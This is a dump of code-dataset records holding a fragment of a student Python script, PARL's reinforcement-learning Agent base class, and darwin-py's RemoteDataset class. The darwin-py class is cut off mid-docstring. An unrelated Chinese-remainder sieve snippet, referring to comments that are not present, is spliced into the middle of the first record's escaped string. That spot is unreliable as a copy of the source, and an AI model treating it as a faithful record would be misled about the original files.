if choices == \"n\":\n comments = [\"You're doing great\", \"Great job!\", \"That was great!\", \"Impressive!\"]\n print(random.choice(comments))\n break\n elif choices != \"y\":\n print(\"Invalid input. 
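# The search-by-sieving idea spelled out in the day13 comments above, as a
# compact standalone function; the assertion uses the puzzle's published worked
# example (buses 7,13,x,x,59,31,19 -> timestamp 1068781):
def crt_sieve(periods, offsets):
    t, step = 0, 1
    for period, offset in zip(periods, offsets):
        # advance t in multiples of the periods already satisfied,
        # so earlier congruences remain intact
        while (t + offset) % period != 0:
            t += step
        step *= period
    return t

assert crt_sieve([7, 13, 59, 31, 19], [0, 1, 4, 6, 7]) == 1068781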
Please enter 'y' or 'n'.\")\n \n except OSError as e:\n print(f\"Error: {e}\")\n \n# call the function\nwrite()","repo_name":"jjaenim/A4-Problem3","sub_path":"Problem 3.py","file_name":"Problem 3.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"1683674946","text":"import warnings\nwarnings.simplefilter('default')\n\nimport os\nimport paddle\nimport paddle.fluid as fluid\nfrom parl.core.fluid import layers\nfrom parl.core.agent_base import AgentBase\nfrom parl.core.fluid.algorithm import Algorithm\nfrom parl.utils import machine_info\nfrom parl.utils import logger\n\n__all__ = ['Agent']\n\n\nclass Agent(AgentBase):\n \"\"\"\n | `alias`: ``parl.Agent``\n | `alias`: ``parl.core.fluid.agent.Agent``\n\n | Agent is one of the three basic classes of PARL.\n\n | It is responsible for interacting with the environment and collecting data for training the policy.\n | To implement a customized ``Agent``, users can:\n\n .. code-block:: python\n\n import parl\n\n class MyAgent(parl.Agent):\n def __init__(self, algorithm, act_dim):\n super(MyAgent, self).__init__(algorithm)\n self.act_dim = act_dim\n This class will initialize the neural network parameters automatically, and provides an executor for users to run the programs (self.fluid_executor).\n\n Attributes:\n fluid_executor (fluid.Executor): executor for running programs of the agent.\n alg (parl.algorithm): algorithm of this agent.\n\n Public Functions:\n - ``build_program`` (**abstract function**): build various programs for the agent to interact with outer environment.\n - ``get_weights``: return a Python dictionary containing all the parameters of self.alg.\n - ``set_weights``: copy parameters from ``set_weights()`` to this agent.\n - ``sample``: return a noisy action to perform exploration according to the policy.\n - ``predict``: return an action given current observation.\n - ``learn``: update the parameters of self.alg using the `learn_program` defined in `build_program()`.\n - ``save``: save parameters of the ``agent`` to a given path.\n - ``restore``: restore previous saved parameters from a given path.\n\n Todo:\n - allow users to get parameters of a specified model by specifying the model's name in ``get_weights()``.\n\n \"\"\"\n\n def __init__(self, algorithm):\n \"\"\"Build programs by calling the method ``self.build_program()`` and run initialization function of ``fluid.default_startup_program()``.\n\n Args:\n algorithm (parl.Algorithm): an instance of `parl.Algorithm`. This algorithm is then passed to `self.alg`.\n \"\"\"\n\n assert isinstance(algorithm, Algorithm)\n super(Agent, self).__init__(algorithm)\n\n self.gpu_id = 0 if machine_info.is_gpu_available() else -1\n\n self.build_program()\n\n if machine_info.is_xpu_available():\n self.place = fluid.XPUPlace(int(os.getenv(\"FLAGS_selected_xpus\")))\n elif machine_info.is_gpu_available():\n self.place = fluid.CUDAPlace(0)\n else:\n self.place = fluid.CPUPlace()\n self.fluid_executor = fluid.Executor(self.place)\n self.fluid_executor.run(fluid.default_startup_program())\n\n def build_program(self):\n \"\"\"Build various programs here with the\n learn, predict, sample functions of the algorithm.\n\n Note:\n | Users **must** implement this function in an ``Agent``.\n | This function will be called automatically in the initialization function.\n\n To build a program, you must do the following:\n a. Create a fluid program with ``fluid.program_guard()``;\n b. 
Define data layers for feeding the data;\n c. Build various programs(e.g., learn_program, predict_program) with data layers defined in step b.\n\n Example:\n\n .. code-block:: python\n\n self.pred_program = fluid.Program()\n\n with fluid.program_guard(self.pred_program):\n obs = layers.data(\n name='obs', shape=[self.obs_dim], dtype='float32')\n self.act_prob = self.alg.predict(obs)\n\n\n \"\"\"\n raise NotImplementedError\n\n def get_model_ids(self):\n \"\"\"Get all model ids of the self.alg in the agent.\n\n Returns:\n List of model_id \n \"\"\"\n return self.alg.get_model_ids()\n\n @property\n def model_ids(self):\n return self.get_model_ids()\n\n def learn(self, *args, **kwargs):\n \"\"\"The training interface for ``Agent``.\n This function feeds the training data into the learn_program defined in ``build_program()``.\n \"\"\"\n raise NotImplementedError\n\n def predict(self, *args, **kwargs):\n \"\"\"Predict an action when given the observation of the environment.\n\n This function feeds the observation into the prediction program defined in ``build_program()``. It is often used in the evaluation stage.\n \"\"\"\n raise NotImplementedError\n\n def sample(self, *args, **kwargs):\n \"\"\"Return an action with noise when given the observation of the environment.\n\n In general, this function is used in train process as noise is added to the action to preform exploration.\n\n \"\"\"\n raise NotImplementedError\n\n def save(self, save_path=None, program=None):\n \"\"\"Save parameters.\n\n Args:\n save_path(str): a directory where to save the parameters.\n program(fluid.Program): program that describes the neural network structure. If None, will all program.\n\n Raises:\n Error: if program does not exist\n\n Example:\n\n .. code-block:: python\n\n agent = AtariAgent()\n agent.save('./model_dir')\n agent.save('./model_dir', program=agent.learn_program)\n\n \"\"\"\n assert save_path is not None, 'please specify `save_path` '\n if os.path.isfile(save_path):\n raise Exception('can not save to {}, it is a file, not directory'.\n format(save_path))\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n all_programs = [(key, val) for (key, val) in self.__dict__.items()\n if (isinstance(val, fluid.framework.Program)\n or isinstance(val, fluid.compiler.CompiledProgram))\n ]\n\n if program:\n filename = None\n for (name, prog) in all_programs:\n if program == prog:\n filename = name\n break\n if filename is None:\n raise Exception('can not find program {}.'.format(program))\n fluid.io.save_params(\n executor=self.fluid_executor,\n dirname=save_path,\n main_program=program,\n filename=filename)\n else:\n for (filename, program) in all_programs:\n if isinstance(program, fluid.framework.Program) or \\\n isinstance(program, fluid.compiler.CompiledProgram):\n fluid.io.save_params(\n executor=self.fluid_executor,\n dirname=save_path,\n main_program=program,\n filename=filename)\n\n def restore(self, save_path=None, program=None):\n \"\"\"Restore previously saved parameters from save_path. \n\n Args:\n save_path(str): path where parameters were previously saved.\n program(fluid.Program): program that describes the neural network structure. If None, will restore all program.\n\n Raises:\n Error: if save_path does not exist or can not find the specific program file in save_path.\n\n Example:\n\n .. 
code-block:: python\n\n agent = AtariAgent()\n agent.save('./model_dir')\n agent.restore('./model_dir')\n\n \"\"\"\n assert save_path is not None, 'please specify `save_path` '\n if not os.path.exists(save_path):\n raise Exception(\n 'can not restore from {}, directory does not exists'.format(\n save_path))\n if os.path.isfile(save_path):\n raise Exception(\n 'can not restore from {}, it is a file, not directory'.format(\n save_path))\n all_programs = [(key, val) for (key, val) in self.__dict__.items()\n if (isinstance(val, fluid.framework.Program)\n or isinstance(val, fluid.compiler.CompiledProgram))\n ]\n\n if program:\n filename = None\n for (name, prog) in all_programs:\n if program == prog:\n filename = name\n break\n if filename is None:\n raise Exception('can not find the program to restore.')\n if not os.path.isfile('{}/{}'.format(save_path, filename)):\n raise Exception('{}/{} does not exits'.format(\n save_path, filename))\n if type(program) is fluid.compiler.CompiledProgram:\n program = program._init_program\n fluid.io.load_params(\n executor=self.fluid_executor,\n dirname=save_path,\n main_program=program,\n filename=filename)\n else:\n programs_list = [kv[0] for kv in all_programs]\n exist_files = os.listdir(save_path)\n if len(programs_list) != len(exist_files):\n raise Exception(\n 'expected to restore {} model file under directory {}: {}, but {} files are found: {}.'\n .format(\n len(programs_list), save_path, programs_list,\n len(exist_files), exist_files))\n for (filename, program) in all_programs:\n if not os.path.isfile('{}/{}'.format(save_path, filename)):\n raise Exception('{}/{} does not exits'.format(\n save_path, filename))\n if type(program) is fluid.compiler.CompiledProgram:\n program = program._init_program\n\n fluid.io.load_params(\n executor=self.fluid_executor,\n dirname=save_path,\n main_program=program,\n filename=filename)\n","repo_name":"PaddlePaddle/PARL","sub_path":"parl/core/fluid/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":10204,"program_lang":"python","lang":"en","doc_type":"code","stars":3097,"dataset":"github-code","pt":"50"} +{"seq_id":"13959288122","text":"import os\nimport shutil\nimport tempfile\nimport zipfile\nfrom datetime import datetime\nfrom pathlib import Path\nfrom typing import (\n TYPE_CHECKING,\n Any,\n Callable,\n Dict,\n Iterable,\n Iterator,\n List,\n Optional,\n Sequence,\n Tuple,\n Union,\n)\n\nimport orjson as json\nfrom rich.console import Console\n\nfrom darwin.dataset.download_manager import download_all_images_from_annotations\nfrom darwin.dataset.identifier import DatasetIdentifier\nfrom darwin.dataset.release import Release\nfrom darwin.dataset.split_manager import split_dataset\nfrom darwin.dataset.upload_manager import (\n FileUploadCallback,\n LocalFile,\n ProgressCallback,\n UploadHandler,\n)\nfrom darwin.dataset.utils import (\n exhaust_generator,\n get_annotations,\n get_classes,\n is_unix_like_os,\n make_class_lists,\n)\nfrom darwin.datatypes import AnnotationClass, AnnotationFile, ItemId, PathLike, Team\nfrom darwin.exceptions import MissingDependency, NotFound, UnsupportedExportFormat\nfrom darwin.exporter.formats.darwin import build_image_annotation\nfrom darwin.item import DatasetItem\nfrom darwin.item_sorter import ItemSorter\nfrom darwin.utils import parse_darwin_json, split_video_annotation, urljoin\n\nif TYPE_CHECKING:\n from darwin.client import Client\n\nfrom abc import ABC, abstractmethod\n\n\nclass RemoteDataset(ABC):\n \"\"\"\n Manages the remote and local versions of a dataset 
hosted on Darwin.\n It allows several dataset management operations such as syncing between\n remote and local, pulling a remote dataset, removing the local files, ...\n\n Parameters\n ----------\n client : Client\n Client to use for interaction with the server.\n team : str\n Team the dataset belongs to.\n name : str\n Name of the datasets as originally displayed on Darwin.\n It may contain white spaces, capital letters and special characters, e.g. `Bird Species!`.\n slug : str\n This is the dataset name with everything lower-case, removed specials characters and\n spaces are replaced by dashes, e.g., `bird-species`. This string is unique within a team.\n dataset_id : int\n Unique internal reference from the Darwin backend.\n item_count : int, default: 0\n Dataset size (number of items).\n progress : float, default: 0\n How much of the dataset has been annotated 0.0 to 1.0 (1.0 == 100%).\n\n Attributes\n ----------\n client : Client\n Client to use for interaction with the server.\n team : str\n Team the dataset belongs to.\n name : str\n Name of the datasets as originally displayed on Darwin.\n It may contain white spaces, capital letters and special characters, e.g. `Bird Species!`.\n slug : str\n This is the dataset name with everything lower-case, removed specials characters and\n spaces are replaced by dashes, e.g., `bird-species`. This string is unique within a team.\n dataset_id : int\n Unique internal reference from the Darwin backend.\n item_count : int, default: 0\n Dataset size (number of items).\n progress : float, default: 0\n How much of the dataset has been annotated 0.0 to 1.0 (1.0 == 100%).\n \"\"\"\n\n def __init__(\n self,\n *,\n client: \"Client\",\n team: str,\n name: str,\n slug: str,\n dataset_id: int,\n item_count: int = 0,\n progress: float = 0,\n version: int = 1,\n release: Optional[str] = None,\n ):\n self.team = team\n self.name = name\n self.slug = slug or name\n self.dataset_id = dataset_id\n self.item_count = item_count\n self.progress = progress\n self.client = client\n self.annotation_types: Optional[List[Dict[str, Any]]] = None\n self.console: Console = Console()\n self.version = version\n self.release = release\n\n @abstractmethod\n def push(\n self,\n files_to_upload: Optional[Sequence[Union[PathLike, LocalFile]]],\n *,\n blocking: bool = True,\n multi_threaded: bool = True,\n max_workers: Optional[int] = None,\n fps: int = 0,\n as_frames: bool = False,\n extract_views: bool = False,\n files_to_exclude: Optional[List[PathLike]] = None,\n path: Optional[str] = None,\n preserve_folders: bool = False,\n progress_callback: Optional[ProgressCallback] = None,\n file_upload_callback: Optional[FileUploadCallback] = None,\n ) -> UploadHandler:\n pass\n\n def split_video_annotations(self, release_name: str = \"latest\") -> None:\n \"\"\"\n Splits the video annotations from this ``RemoteDataset`` using the given release.\n\n Parameters\n ----------\n release_name : str, default: \"latest\"\n The name of the release to use.\n \"\"\"\n release_dir: Path = self.local_path / \"releases\" / release_name\n annotations_path: Path = release_dir / \"annotations\"\n\n for count, annotation_file in enumerate(annotations_path.glob(\"*.json\")):\n darwin_annotation: Optional[AnnotationFile] = parse_darwin_json(\n annotation_file, count\n )\n if not darwin_annotation or not darwin_annotation.is_video:\n continue\n\n frame_annotations = split_video_annotation(darwin_annotation)\n for frame_annotation in frame_annotations:\n annotation = 
build_image_annotation(frame_annotation)\n\n video_frame_annotations_path = annotations_path / annotation_file.stem\n video_frame_annotations_path.mkdir(exist_ok=True, parents=True)\n\n stem = Path(frame_annotation.filename).stem\n output_path = video_frame_annotations_path / f\"{stem}.json\"\n with output_path.open(\"w\") as f:\n op = json.dumps(annotation).decode(\"utf-8\")\n f.write(op)\n\n # Finally delete video annotations\n annotation_file.unlink()\n\n # Update class list, which is used when loading local annotations in a dataset\n make_class_lists(release_dir)\n\n def pull(\n self,\n *,\n release: Optional[Release] = None,\n blocking: bool = True,\n multi_threaded: bool = True,\n only_annotations: bool = False,\n force_replace: bool = False,\n remove_extra: bool = False,\n subset_filter_annotations_function: Optional[Callable] = None,\n subset_folder_name: Optional[str] = None,\n use_folders: bool = False,\n video_frames: bool = False,\n force_slots: bool = False,\n ignore_slots: bool = False,\n ) -> Tuple[Optional[Callable[[], Iterator[Any]]], int]:\n \"\"\"\n Downloads a remote dataset (images and annotations) to the datasets directory.\n\n Parameters\n ----------\n release: Optional[Release], default: None\n The release to pull.\n blocking : bool, default: True\n If False, the dataset is not downloaded and a generator function is returned instead.\n multi_threaded : bool, default: True\n Uses multiprocessing to download the dataset in parallel. If blocking is False this has no effect.\n only_annotations : bool, default: False\n Download only the annotations and no corresponding images.\n force_replace : bool, default: False\n Forces the re-download of an existing image.\n remove_extra : bool, default: False\n Removes existing images for which there is not corresponding annotation.\n subset_filter_annotations_function: Optional[Callable], default: None\n This function receives the directory where the annotations are downloaded and can\n perform any operation on them i.e. filtering them with custom rules or else.\n If it needs to receive other parameters is advised to use functools.partial() for it.\n subset_folder_name: Optional[str], default: None\n Name of the folder with the subset of the dataset. If not provided a timestamp is used.\n use_folders : bool, default: False\n Recreates folders from the dataset.\n video_frames : bool, default: False\n Pulls video frames images instead of video files.\n force_slots: bool\n Pulls all slots of items into deeper file structure ({prefix}/{item_name}/{slot_name}/{file_name})\n\n Returns\n -------\n generator : function\n Generator for doing the actual downloads. 
This is None if blocking is ``True``.\n count : int\n The number of files.\n\n Raises\n ------\n UnsupportedExportFormat\n If the given ``release`` has an invalid format.\n ValueError\n If darwin in unable to get ``Team`` configuration.\n \"\"\"\n\n console = self.console or Console()\n\n if release is None:\n release = self.get_release()\n\n if release.format != \"json\" and release.format != \"darwin_json_2\":\n raise UnsupportedExportFormat(release.format)\n\n release_dir = self.local_releases_path / release.name\n release_dir.mkdir(parents=True, exist_ok=True)\n\n with tempfile.TemporaryDirectory() as tmp_dir_str:\n tmp_dir = Path(tmp_dir_str)\n # Download the release from Darwin\n zip_file_path = release.download_zip(tmp_dir / \"dataset.zip\")\n with zipfile.ZipFile(zip_file_path) as z:\n # Extract annotations\n z.extractall(tmp_dir)\n # If a filtering function is provided, apply it\n if subset_filter_annotations_function is not None:\n subset_filter_annotations_function(tmp_dir)\n if subset_folder_name is None:\n subset_folder_name = datetime.now().strftime(\n \"%m/%d/%Y_%H:%M:%S\"\n )\n annotations_dir: Path = (\n release_dir / (subset_folder_name or \"\") / \"annotations\"\n )\n # Remove existing annotations if necessary\n if annotations_dir.exists():\n try:\n shutil.rmtree(annotations_dir)\n except PermissionError:\n print(\n f\"Could not remove dataset in {annotations_dir}. Permission denied.\"\n )\n annotations_dir.mkdir(parents=True, exist_ok=False)\n stems: dict = {}\n\n # Move the annotations into the right folder and rename them to have the image\n # original filename as contained in the json\n for annotation_path in tmp_dir.glob(\"*.json\"):\n annotation = parse_darwin_json(annotation_path, count=None)\n if annotation is None:\n continue\n\n if video_frames and any(\n not slot.frame_urls for slot in annotation.slots\n ):\n # will raise if not installed via pip install darwin-py[ocv]\n try:\n from cv2 import (\n VideoCapture, # pylint: disable=import-outside-toplevel\n )\n except ImportError as e:\n raise MissingDependency(\n \"Missing Dependency: OpenCV required for Video Extraction. Install with `pip install darwin-py\\[ocv]`\"\n ) from e\n filename = Path(annotation.filename).stem\n if filename in stems:\n stems[filename] += 1\n filename = f\"{filename}_{stems[filename]}\"\n else:\n stems[filename] = 1\n\n destination_name = (\n annotations_dir / f\"{filename}{annotation_path.suffix}\"\n )\n shutil.move(str(annotation_path), str(destination_name))\n\n # Extract the list of classes and create the text files\n make_class_lists(release_dir)\n\n if release.latest and is_unix_like_os():\n try:\n latest_dir: Path = self.local_releases_path / \"latest\"\n if latest_dir.is_symlink():\n latest_dir.unlink()\n\n target_link: Path = self.local_releases_path / release_dir.name\n latest_dir.symlink_to(target_link)\n except OSError:\n self.console.log(\n f\"Could not mark release {release.name} as latest. 
Continuing...\"\n )\n\n if only_annotations:\n # No images will be downloaded\n return None, 0\n\n team_config: Optional[Team] = self.client.config.get_team(self.team)\n if not team_config:\n raise ValueError(\"Unable to get Team configuration.\")\n\n api_key = team_config.api_key\n\n # Create the generator with the download instructions\n progress, count = download_all_images_from_annotations(\n api_key=api_key,\n api_url=self.client.url,\n annotations_path=annotations_dir,\n images_path=self.local_images_path,\n force_replace=force_replace,\n remove_extra=remove_extra,\n use_folders=use_folders,\n video_frames=video_frames,\n force_slots=force_slots,\n ignore_slots=ignore_slots,\n )\n if count == 0:\n return None, count\n\n # If blocking is selected, download the dataset on the file system\n if blocking:\n max_workers = None\n env_max_workers = os.getenv(\"DARWIN_DOWNLOAD_FILES_CONCURRENCY\")\n if env_max_workers and int(env_max_workers) > 0:\n max_workers = int(env_max_workers)\n\n console.print(\n f\"Going to download {str(count)} files to {self.local_images_path.as_posix()} .\"\n )\n successes, errors = exhaust_generator(\n progress=progress(),\n count=count,\n multi_threaded=multi_threaded,\n worker_count=max_workers,\n )\n if errors:\n self.console.print(\n f\"Encountered errors downloading {len(errors)} files\"\n )\n for error in errors:\n self.console.print(f\"\\t - {error}\")\n\n downloaded_file_count = len(\n [\n f\n for f in self.local_images_path.rglob(\"*\")\n if f.is_file() and not f.name.startswith(\".\")\n ]\n )\n\n console.print(\n f\"Total file count after download completed {str(downloaded_file_count)}.\"\n )\n\n return None, count\n else:\n return progress, count\n\n def remove_remote(self) -> None:\n \"\"\"Archives (soft-deletion) this ``RemoteDataset``.\"\"\"\n self.client.archive_remote_dataset(self.dataset_id, self.team)\n\n @abstractmethod\n def fetch_remote_files(\n self,\n filters: Optional[Dict[str, Union[str, List[str]]]] = None,\n sort: Optional[Union[str, ItemSorter]] = None,\n ) -> Iterator[DatasetItem]:\n \"\"\"\n Fetch and lists all files on the remote dataset.\n\n Parameters\n ----------\n filters : Optional[Dict[str, Union[str, List[str]]]], default: None\n The filters to use. Files excluded by the filter won't be fetched.\n sort : Optional[Union[str, ItemSorter]], default: None\n A sorting direction. 
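# A hedged usage sketch of the non-blocking pull path documented above; the
# team and dataset slugs are hypothetical and error handling is elided:
from darwin.client import Client

client = Client.local()  # reads credentials from the local darwin config
dataset = client.get_remote_dataset("my-team/my-dataset")
progress_fn, count = dataset.pull(blocking=False, multi_threaded=False)
if progress_fn is not None:
    for _ in progress_fn():  # drive the download generator to completion
        pass
print(f"pulled {count} files")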
It can be a string with the values 'asc', 'ascending', 'desc',\n 'descending' or an ``ItemSorter`` instance.\n\n Yields\n -------\n Iterator[DatasetItem]\n An iterator of ``DatasetItem``.\n \"\"\"\n\n @abstractmethod\n def archive(self, items: Iterator[DatasetItem]) -> None:\n \"\"\"\n Archives (soft-deletion) the given ``DatasetItem``\\\\s belonging to this ``RemoteDataset``.\n\n Parameters\n ----------\n items : Iterator[DatasetItem]\n The ``DatasetItem``\\\\s to be archived.\n \"\"\"\n\n @abstractmethod\n def restore_archived(self, items: Iterator[DatasetItem]) -> None:\n \"\"\"\n Restores the archived ``DatasetItem``\\\\s that belong to this ``RemoteDataset``.\n\n Parameters\n ----------\n items : Iterator[DatasetItem]\n The ``DatasetItem``\\\\s to be restored.\n \"\"\"\n\n @abstractmethod\n def move_to_new(self, items: Iterator[DatasetItem]) -> None:\n \"\"\"\n Changes the given ``DatasetItem``\\\\s status to ``new``.\n\n Parameters\n ----------\n items : Iterator[DatasetItem]\n The ``DatasetItem``\\\\s whose status will change.\n \"\"\"\n\n @abstractmethod\n def reset(self, items: Iterator[DatasetItem]) -> None:\n \"\"\"\n Resets the given ``DatasetItem``\\\\s.\n\n Parameters\n ----------\n items : Iterator[DatasetItem]\n The ``DatasetItem``\\\\s to be reset.\n \"\"\"\n\n @abstractmethod\n def complete(self, items: Iterator[DatasetItem]) -> None:\n \"\"\"\n Completes the given ``DatasetItem``\\\\s.\n\n Parameters\n ----------\n items : Iterator[DatasetItem]\n The ``DatasetItem``\\\\s to be completed.\n \"\"\"\n\n @abstractmethod\n def delete_items(self, items: Iterator[DatasetItem]) -> None:\n \"\"\"\n Deletes the given ``DatasetItem``\\\\s.\n\n Parameters\n ----------\n items : Iterator[DatasetItem]\n The ``DatasetItem``\\\\s to be deleted.\n \"\"\"\n\n def fetch_annotation_type_id_for_name(self, name: str) -> Optional[int]:\n \"\"\"\n Fetches annotation type id for a annotation type name, such as ``bounding_box``.\n\n Parameters\n ----------\n name: str\n The name of the annotation we want the id for.\n\n\n Returns\n -------\n Optional[int]\n The id of the annotation type or ``None`` if it doesn't exist.\n \"\"\"\n if not self.annotation_types:\n self.annotation_types = self.client.annotation_types()\n\n for annotation_type in self.annotation_types:\n if annotation_type[\"name\"] == name:\n return annotation_type[\"id\"]\n\n return None\n\n def create_annotation_class(\n self, name: str, type: str, subtypes: List[str] = []\n ) -> Dict[str, Any]:\n \"\"\"\n Creates an annotation class for this ``RemoteDataset``.\n\n Parameters\n ----------\n name : str\n The name of the annotation class.\n type : str\n The type of the annotation class.\n subtypes : List[str], default: []\n Annotation class subtypes.\n\n Returns\n -------\n Dict[str, Any]\n Dictionary with the server response.\n\n Raises\n ------\n ValueError\n If a given annotation type or subtype is unknown.\n \"\"\"\n\n type_ids: List[int] = []\n for annotation_type in [type] + subtypes:\n type_id: Optional[int] = self.fetch_annotation_type_id_for_name(\n annotation_type\n )\n if not type_id and self.annotation_types is not None:\n list_of_annotation_types = \", \".join(\n [type[\"name\"] for type in self.annotation_types]\n )\n raise ValueError(\n f\"Unknown annotation type: '{annotation_type}', valid values: {list_of_annotation_types}\"\n )\n\n if type_id is not None:\n type_ids.append(type_id)\n\n return self.client.create_annotation_class(self.dataset_id, type_ids, name)\n\n def add_annotation_class(\n self, annotation_class: 
Union[AnnotationClass, int]\n ) -> Optional[Dict[str, Any]]:\n \"\"\"\n Adds an annotation class to this ``RemoteDataset``.\n\n Parameters\n ----------\n annotation_class : Union[AnnotationClass, int]\n The annotation class to add or its id.\n\n Returns\n -------\n Optional[Dict[str, Any]]\n Dictionary with the server response or ``None`` if the annotation class already\n exists.\n\n Raises\n ------\n ValueError\n If the given ``annotation_class`` does not exist in this ``RemoteDataset``'s team.\n \"\"\"\n # Waiting for a better api for setting classes\n # in the meantime this will do\n all_classes: List[Dict[str, Any]] = self.fetch_remote_classes(True)\n\n if isinstance(annotation_class, int):\n match = [cls for cls in all_classes if cls[\"id\"] == annotation_class]\n if not match:\n raise ValueError(\n f\"Annotation class id: `{annotation_class}` does not exist in Team.\"\n )\n else:\n annotation_class_type = (\n annotation_class.annotation_internal_type\n or annotation_class.annotation_type\n )\n match = [\n cls\n for cls in all_classes\n if cls[\"name\"] == annotation_class.name\n and annotation_class_type in cls[\"annotation_types\"]\n ]\n if not match:\n # We do not expect to reach here, as previous logic divides annotation classes in imports\n # between `in team` and `new to platform`\n raise ValueError(\n f\"Annotation class name: `{annotation_class.name}`, type: `{annotation_class_type}`; does not exist in Team.\"\n )\n\n datasets = match[0][\"datasets\"]\n # check that we are not already part of the dataset\n for dataset in datasets:\n if dataset[\"id\"] == self.dataset_id:\n return None\n datasets.append({\"id\": self.dataset_id})\n # we typecast to dictionary because we are not passing the raw=True parameter.\n class_id = match[0][\"id\"]\n payload = {\"datasets\": datasets, \"id\": class_id}\n return self.client.update_annotation_class(class_id, payload)\n\n def fetch_remote_classes(self, team_wide=False) -> List[Dict[str, Any]]:\n \"\"\"\n Fetches all the Annotation Classes from this ``RemoteDataset``.\n\n Parameters\n ----------\n team_wide : bool, default: False\n If ``True`` will return all Annotation Classes that belong to the team. 
If ``False``\n will only return Annotation Classes which have been added to the dataset.\n\n Returns\n -------\n List[Dict[str, Any]]:\n List of Annotation Classes (can be empty).\n \"\"\"\n all_classes: List[Dict[str, Any]] = self.client.fetch_remote_classes()\n\n classes_to_return = []\n for cls in all_classes:\n belongs_to_current_dataset = any(\n dataset[\"id\"] == self.dataset_id for dataset in cls[\"datasets\"]\n )\n cls[\"available\"] = belongs_to_current_dataset\n if team_wide or belongs_to_current_dataset:\n classes_to_return.append(cls)\n return classes_to_return\n\n def fetch_remote_attributes(self) -> List[Dict[str, Any]]:\n \"\"\"\n Fetches all remote attributes on the remote dataset.\n\n Returns\n -------\n List[Dict[str, Any]]\n A List with the attributes, where each attribute is a dictionary.\n \"\"\"\n return self.client.fetch_remote_attributes(self.dataset_id)\n\n @abstractmethod\n def export(\n self,\n name: str,\n annotation_class_ids: Optional[List[str]] = None,\n include_url_token: bool = False,\n include_authorship: bool = False,\n version: Optional[str] = None,\n ) -> None:\n \"\"\"\n Create a new release for this ``RemoteDataset``.\n\n Parameters\n ----------\n name : str\n Name of the release.\n annotation_class_ids : Optional[List[str]], default: None\n List of the classes to filter.\n include_url_token : bool, default: False\n Should the image url in the export include a token enabling access without team\n membership or not?\n include_authorship : bool, default: False\n If set, include annotator and reviewer metadata for each annotation.\n version : Optional[str], default: None, enum: [\"1.0\", \"2.0\"]\n When used for a V2 dataset, allows forcing generation of either Darwin JSON 1.0 (Legacy) or the newer 2.0.\n Omit this option to get your team's default.\n \"\"\"\n\n @abstractmethod\n def get_report(self, granularity: str = \"day\") -> str:\n \"\"\"\n Returns a String representation of a CSV report for this ``RemoteDataset``.\n\n Parameters\n ----------\n granularity : str, default: \"day\"\n The granularity of the report, can be 'day', 'week' or 'month'.\n\n Returns\n -------\n str\n A CSV report.\n \"\"\"\n\n @abstractmethod\n def get_releases(self) -> List[\"Release\"]:\n \"\"\"\n Get a sorted list of releases with the most recent first.\n\n Returns\n -------\n List[\"Release\"]\n Returns a sorted list of available ``Release``\\\\s with the most recent first.\n \"\"\"\n\n def get_release(self, name: str = \"latest\") -> \"Release\":\n \"\"\"\n Get a specific ``Release`` for this ``RemoteDataset``.\n\n Parameters\n ----------\n name : str, default: \"latest\"\n Name of the export.\n\n Returns\n -------\n Release\n The selected release.\n\n Raises\n ------\n NotFound\n The selected ``Release`` does not exist.\n \"\"\"\n releases = self.get_releases()\n if not releases:\n raise NotFound(str(self.identifier))\n\n # overwrite default name with stored dataset.release if supplied\n if self.release and name == \"latest\":\n name = self.release\n elif name == \"latest\":\n return next((release for release in releases if release.latest))\n\n for release in releases:\n if str(release.name) == name:\n return release\n raise NotFound(str(self.identifier))\n\n def split(\n self,\n val_percentage: float = 0.1,\n test_percentage: float = 0,\n split_seed: int = 0,\n make_default_split: bool = True,\n release_name: Optional[str] = None,\n ) -> None:\n \"\"\"\n Creates lists of file names for each split for train, validation, and test.\n Note: This function needs a local copy of 
the dataset.\n\n Parameters\n ----------\n val_percentage : float, default: 0.1\n Percentage of images used in the validation set.\n test_percentage : float, default: 0\n Percentage of images used in the test set.\n split_seed : int, default: 0\n Fix seed for random split creation.\n make_default_split: bool, default: True\n Makes this split the default split.\n release_name: Optional[str], default: None\n Version of the dataset.\n\n Raises\n ------\n NotFound\n If this ``RemoteDataset`` is not found locally.\n \"\"\"\n if not self.local_path.exists():\n raise NotFound(\n \"Local dataset not found: the split is performed on the local copy of the dataset. \\\n Pull the dataset from Darwin first using pull()\"\n )\n if release_name in [\"latest\", None]:\n release = self.get_release(\"latest\")\n release_name = release.name\n\n split_dataset(\n self.local_path,\n release_name=release_name,\n val_percentage=val_percentage,\n test_percentage=test_percentage,\n split_seed=split_seed,\n make_default_split=make_default_split,\n )\n\n def classes(\n self, annotation_type: str, release_name: Optional[str] = None\n ) -> List[str]:\n \"\"\"\n Returns the list of ``class_type`` classes.\n\n Parameters\n ----------\n annotation_type : str\n The type of annotation classes, e.g. 'tag' or 'polygon'.\n release_name: Optional[str], default: None\n Version of the dataset.\n\n\n Returns\n -------\n classes: List[str]\n List of classes in the dataset of type ``class_type``.\n \"\"\"\n assert self.local_path.exists()\n if release_name in [\"latest\", None]:\n release = self.get_release(\"latest\")\n release_name = release.name\n\n return get_classes(\n self.local_path, release_name=release_name, annotation_type=annotation_type\n )\n\n def annotations(\n self,\n partition: str,\n split: str = \"split\",\n split_type: str = \"stratified\",\n annotation_type: str = \"polygon\",\n release_name: Optional[str] = None,\n annotation_format: Optional[str] = \"darwin\",\n ) -> Iterable[Dict[str, Any]]:\n \"\"\"\n Returns all the annotations of a given split and partition in a single dictionary.\n\n Parameters\n ----------\n partition : str\n Selects one of the partitions [train, val, test].\n split : str, default: \"split\"\n Selects the split that defines the percentages used (use 'split' to select the default split).\n split_type : str, default: \"stratified\"\n Heuristic used to do the split [random, stratified].\n annotation_type : str, default: \"polygon\"\n The type of annotation classes [tag, polygon].\n release_name : Optional[str], default: None\n Version of the dataset.\n annotation_format : Optional[str], default: \"darwin\"\n Re-formatting of the annotation when loaded [coco, darwin].\n\n Yields\n -------\n Dict[str, Any]\n Dictionary representing an annotation from this ``RemoteDataset``.\n \"\"\"\n assert self.local_path.exists()\n if release_name in [\"latest\", None]:\n release = self.get_release(\"latest\")\n release_name = release.name\n\n for annotation in get_annotations(\n self.local_path,\n partition=partition,\n split=split,\n split_type=split_type,\n annotation_type=annotation_type,\n release_name=release_name,\n annotation_format=annotation_format,\n ):\n yield annotation\n\n @abstractmethod\n def workview_url_for_item(self, item: DatasetItem) -> str:\n \"\"\"\n Returns the 